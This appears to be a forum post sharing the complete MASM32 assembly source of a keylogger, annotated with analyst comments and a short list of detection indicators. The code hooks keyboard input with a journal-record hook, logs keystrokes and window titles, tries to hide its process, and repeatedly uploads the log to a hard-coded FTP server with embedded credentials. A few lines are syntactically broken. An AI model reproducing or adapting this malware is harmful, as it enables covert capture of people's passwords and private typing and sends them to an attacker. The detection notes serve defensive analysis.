Hier ein simpler Keylogger mit FTP-Upload von DaRkReD aus OpenSc.ws mit sehr kleiner Dateigröße.
;Alpha FTP logger
;By DaRkReD
;Released on 3/31/2011
;
; Analyst notes (MASM32, 32-bit flat model, stdcall):
;   This part of the listing holds the includes and all global data.
;   Static indicators visible here:
;     - imports from wininet (FTP API) alongside user32 hook APIs
;     - a hard-coded FTP host, user name and password stored as plain
;       strings in the data section (recoverable with a strings dump)
;     - the agent string 'Caller' and the file names 'key.txt',
;       'test3.txt', 'Key.txt' and 'Keyz.txt'
;     - the string "RegisterServiceProcess" next to "kernel32.dll",
;       i.e. the API is resolved by name at run time
.486
.model flat, stdcall
option casemap :none

include C:\masm32\include\windows.inc
include C:\masm32\include\kernel32.inc
include C:\masm32\include\user32.inc
include C:\masm32\include\wininet.inc
includelib C:\masm32\lib\kernel32.lib
includelib C:\masm32\lib\user32.lib
includelib C:\masm32\lib\wininet.lib

; Prototype of the hook procedure (code, wParam, lParam).
JournalLogHook PROTO :DWORD, :DWORD, :DWORD

NAME_BUFF_SIZE = MAX_COMPUTERNAME_LENGTH + 1

.data
; --- FTP upload parameters, all passed to wininet calls in ThreadProc ---
appName DB 'Caller', 0                  ; first argument of InternetOpen (agent string)
FTPAddress DB '192.168.1.66', 0         ; FTP server; an RFC 1918 private address in this sample
Username DB 'nobody', 0
Password DB,'redacted' 0                ; value is redacted on the page
localFile DB 'key.txt', 0               ; local file name handed to FtpPutFile
remoteFile DB 'test3.txt', 0            ; name the file is stored under on the server
hInternet HANDLE ?
hConnect HANDLE ?

; --- log formatting ---
bracket1 db "<"                         ; written before a named (non-character) key
bracket2 db ">"                         ; written after a named key
linefeed db 13,10,13,10,"[> %s <]",13,10,0;     ; wsprintf format for a window-title header line

; --- hook state ---
isLogging dd 1                          ; message-loop condition; no code in this listing writes it
vKey dd 0                               ; virtual-key value taken from EVENTMSG.paramL
nScan dd 0                              ; scan-code value passed to GetKeyNameText / ToAsciiEx
dwCount dd 0                            ; length returned by GetKeyNameText
schar db 2 dup (0)                      ; output buffer for ToAsciiEx

; --- strings used to look up RegisterServiceProcess by name ---
kernel_name db "kernel32.dll", 0
kernel_function db "RegisterServiceProcess", 0

nSize dd NAME_BUFF_SIZE

; --- log file name parts; the path is assembled at start ---
keyvalz db "Key.txt"                    ; suffix appended after the random number
logfilecon db 14 dup(?)
logfileN db "Keyz.txt", 16 dup(0)
zlogfilecon db 14 dup(?)                ; receives the sFmt output followed by keyvalz
alogfilecon db 255 dup(?)               ; final path passed to CreateFile in the hook
drive db "C:\",0
random_seed dd ?                        ; state of the generator in Random
res dd 0                                ; result of Random,9000
sFmt db 'C:\%u',0                       ; wsprintf format for the numeric part
sBuf db 10 dup(0)

.data?
ThreadID DWORD ?
logfile db 261 dup (?)
hinstance HINSTANCE ?
aMsg MSG <?>
LogHook dd ?                            ; value returned by SetWindowsHookEx
svBuffer dword ?                        ; destination passed to GetKeyNameText
WinDir db 35 dup(?)
MyPath db 256 dup(?)
kBuffer db 256 dup (?)                  ; used for both the window title and the keyboard state
kFwin db 256 dup (?)
kGkl db 256 dup (?)
wBuffer db 512 dup (?)                  ; formatted window-title header
chcount dd ?
dwBytes dd ?
aFocus dd ?                             ; window handle from GetActiveWindow
lFocus dd ?                             ; previously logged window handle
lastvKey dd ?
NameBuffer db NAME_BUFF_SIZE dup(?)
; Analyst notes for the code section (behaviour as written in this listing):
;   1. start builds a log path, attempts a by-name call to
;      RegisterServiceProcess, installs a WH_JOURNALRECORD hook and starts
;      one worker thread.
;   2. JournalLogHook appends window titles and key data to the log file
;      on every WM_KEYDOWN event it receives.
;   3. ThreadProc opens a plain FTP session and calls FtpPutFile in an
;      endless loop with a 300 ms pause.
; Detection / mitigation points a defender can take from this:
;   - SetWindowsHookEx with WH_JOURNALRECORD from an unsigned user process
;     is rare in legitimate software; Microsoft's documentation marks the
;     journaling hook APIs as unsupported starting with Windows 11.
;   - Repeated outbound FTP (control port 21, passive mode) from a
;     non-FTP-client process, several sessions per second, is a strong
;     network indicator; egress filtering of FTP blocks the upload.
;   - FTP carries the user name, password and payload in clear text, so
;     the traffic is inspectable on the wire.
;   - A file in the drive root whose name is a number followed by
;     "Key.txt" that is re-opened for append on each key press.
.code

;-----------------------------------------------------------------------
; ThreadProc - worker thread started from start via CreateThread.
; Loops forever: open a wininet session, connect to FTPAddress with the
; hard-coded credentials, upload localFile as remoteFile, close both
; handles, sleep 300 ms. No return value of any call is checked.
;-----------------------------------------------------------------------
ThreadProc proc
;----FTP UPLOAD----
FTP:
    Invoke InternetOpen, Addr appName, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0
    Mov hInternet, Eax
    ; passive-mode FTP on the default FTP port
    Invoke InternetConnect, hInternet, Addr FTPAddress, INTERNET_DEFAULT_FTP_PORT, Addr Username, Addr Password, INTERNET_SERVICE_FTP, INTERNET_FLAG_PASSIVE, 0
    Mov hConnect, Eax
    ; localFile is a bare file name - presumably resolved against the
    ; process's current directory; confirm when examining a sample
    Invoke FtpPutFile, hConnect, Addr localFile, Addr remoteFile, FTP_TRANSFER_TYPE_BINARY, 0
    Invoke InternetCloseHandle, hConnect
    Invoke InternetCloseHandle, hInternet
    Invoke Sleep,300
    jmp FTP                             ; unconditional: the thread never exits
ThreadProc endp

;-----------------------------------------------------------------------
; JournalLogHook - hook procedure registered for WH_JOURNALRECORD.
; In:   code   = hook code
;       wParam = passed through to CallNextHookEx
;       lParam = pointer to an EVENTMSG when code == HC_ACTION
; Out:  eax    = result of CallNextHookEx
; For each WM_KEYDOWN event: opens alogfilecon for append, writes a
; "[> title <]" header when the active window handle changed, then
; writes either the translated character or "<key name>", and closes
; the file again.
;-----------------------------------------------------------------------
JournalLogHook proc uses edi code:DWORD, wParam:WPARAM, lParam:LPARAM
    LOCAL filehandle:dword

    .if code < 0
        invoke CallNextHookEx, LogHook, code, wParam, lParam
        ret
    .endif

    .if code == HC_ACTION
        mov edi, lParam
        assume edi:ptr EVENTMSG
        .if [edi].message == WM_KEYDOWN
            ; vKey = paramL with bits 8..15 cleared
            mov eax, [edi].paramL
            mov ah, 0
            mov vKey, eax
            ; nScan = paramL with the low byte cleared, shifted left by 8,
            ; which places the byte from bits 8..15 at bits 16..23
            mov eax, [edi].paramL
            mov al, 0
            shl eax, 8
            mov nScan, eax

            ; open (or create) the log file and seek to its end
            invoke CreateFile, addr alogfilecon,GENERIC_WRITE,FILE_SHARE_READ,NULL,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL
            mov filehandle, eax
            invoke SetFilePointer, filehandle,NULL, NULL, FILE_END

            ; key name text; dwCount = length returned
            invoke GetKeyNameText, nScan,addr svBuffer, 256
            mov dwCount, eax

            ; write a window-title header when the handle differs from
            ; the one recorded in lFocus
            invoke GetActiveWindow
            mov aFocus, eax
            .if eax != lFocus
                mov lFocus, eax
                invoke GetWindowText, aFocus, addr kBuffer, 256
                mov chcount, eax
                .if chcount > 0
                    invoke wsprintf, addr wBuffer, addr linefeed, addr kBuffer
                    invoke lstrlen, addr wBuffer
                    mov chcount, eax
                    invoke WriteFile, filehandle, addr wBuffer, chcount, addr dwBytes, NULL
                .endif
            .endif

            .if dwCount > 0
                ; space, caps lock and shift are forced onto the
                ; single-character path below
                .if vKey == VK_SPACE
                    mov svBuffer, 32
                    mov svBuffer + 1, 0
                    mov dwCount, 1
                .endif
                .if vKey == VK_CAPITAL
                    mov svBuffer,0
                    mov dwCount,1
                .endif
                .if vKey == VK_SHIFT
                    mov svBuffer,0
                    mov dwCount,1
                .endif

                .if dwCount == 1
                    ; 186 is 0BAh (VK_OEM_1 in the Windows headers)
                    .if lastvKey != 186
                        ; translate using the current keyboard state and
                        ; the layout of the foreground window's thread
                        invoke GetKeyboardState, addr kBuffer
                        invoke GetForegroundWindow
                        invoke GetWindowThreadProcessId,eax,0
                        invoke GetKeyboardLayout ,eax;
                        invoke ToAsciiEx, vKey, nScan, addr kBuffer, addr schar, 0 ,eax
                        mov chcount, eax
                    .else
                        ; previous key was 186: store the low byte of
                        ; vKey directly instead of calling ToAsciiEx
                        mov chcount, 1
                        mov eax, vKey
                        mov schar, al
                    .endif
                    .if chcount > 0
                        invoke WriteFile, filehandle, addr schar, chcount, addr dwBytes, NULL
                    .endif
                .else
                    ; named key: written as <name>
                    invoke WriteFile, filehandle, addr bracket1, 1, addr dwBytes, NULL
                    invoke WriteFile, filehandle, addr svBuffer, dwCount, addr dwBytes, NULL
                    invoke WriteFile, filehandle, addr bracket2, 1, addr dwBytes, NULL
                    .if vKey == VK_RETURN
                        ; first two bytes of linefeed are CR LF
                        invoke WriteFile, filehandle, addr linefeed, 2, addr dwBytes, NULL
                    .endif
                .endif
                mov eax, vKey
                mov lastvKey, eax
            .endif

            invoke CloseHandle, filehandle
        .endif
    .endif

    invoke CallNextHookEx, LogHook, code, wParam, lParam
    ret
JournalLogHook endp

;-----------------------------------------------------------------------
; str_cat - append the zero-terminated string strAdd to strBase.
; In:   strBase = destination string, strAdd = string to append
; Scans strBase for a zero byte with repne scasb, then copies strAdd
; byte by byte including its terminator. Modifies eax, edi and esi;
; the proc declares no "uses" list.
;-----------------------------------------------------------------------
str_cat proc strBase:DWORD, strAdd:DWORD
    mov edi, strBase
    mov al, 0
    repne scasb
    dec edi                             ; step back onto the zero byte
    mov esi, strAdd
@@:
    mov al, [esi]
    mov [edi], al
    inc esi
    inc edi
    test al, al
    jnz @B                              ; stop after the terminator is copied
    ret
str_cat endp

;-----------------------------------------------------------------------
; Random - multiplicative generator scaled to dwBase.
; In:   dwBase = scale factor
; Out:  eax    = high dword of dwBase * new seed
; random_seed = random_seed * 08088405h + 1 on every call.
; ebx is saved, zeroed and restored but not otherwise used.
;-----------------------------------------------------------------------
Random proc dwBase:dword
    push ebx
    mov eax,dwBase
    xor ebx,ebx
    imul edx,random_seed,08088405h
    inc edx
    mov random_seed,edx
    mul edx                             ; edx:eax = dwBase * seed
    mov eax,edx
    pop ebx
    ret
Random endp

;-----------------------------------------------------------------------
; Randomize - seed the generator with the GetTickCount value.
;-----------------------------------------------------------------------
Randomize proc
    invoke GetTickCount
    mov random_seed,eax
    ret
Randomize endp

;-----------------------------------------------------------------------
; start - program entry point.
;-----------------------------------------------------------------------
start:
    ; build the log path:
    ;   sBuf        = wsprintf('C:\%u', Random(9000))
    ;   zlogfilecon = sBuf followed by keyvalz
    ;   alogfilecon = drive ("C:\") followed by zlogfilecon
    invoke Randomize
    invoke Random,9000
    mov res,EAX
    invoke wsprintf,ADDR sBuf,ADDR sFmt,res
    invoke lstrcpy,ADDR zlogfilecon,ADDR sBuf
    invoke str_cat,ADDR zlogfilecon,ADDR keyvalz
    invoke lstrcpy,ADDR alogfilecon,ADDR drive
    invoke lstrcat,ADDR alogfilecon,ADDR zlogfilecon

    ;try to hide only 9x
    ; RegisterServiceProcess is looked up by name and called with
    ; arguments (0, 1) only when GetProcAddress returns non-NULL
    invoke GetModuleHandle, ADDR kernel_name
    invoke GetProcAddress, eax, ADDR kernel_function
    .if eax != NULL
        push 1
        push 0
        call eax
    .endif

    invoke GetModuleHandle, NULL
    ;--
    mov hinstance, eax

    ; install the journal-record hook and start the upload thread
    invoke SetWindowsHookEx, WH_JOURNALRECORD,addr JournalLogHook,hinstance, NULL
    mov LogHook, eax
    mov eax,OFFSET ThreadProc
    invoke CreateThread,NULL,NULL,eax,NULL,0,ADDR ThreadID

    ; message loop; SetWindowsHookEx is called again on every iteration
    ; and LogHook is overwritten with the new return value
    .while isLogging == 1
        invoke WaitMessage
        invoke GetMessage, addr aMsg, NULL, 0, 0
        invoke SetKeyboardState, addr kBuffe
        invoke SetWindowsHookEx, WH_JOURNALRECORD,addr JournalLogHook,hinstance, NULL
        mov LogHook, eax
    .endw

    ; reached only if isLogging changes
    invoke UnhookWindowsHookEx,addr LogHook
    invoke ExitProcess, 0
end start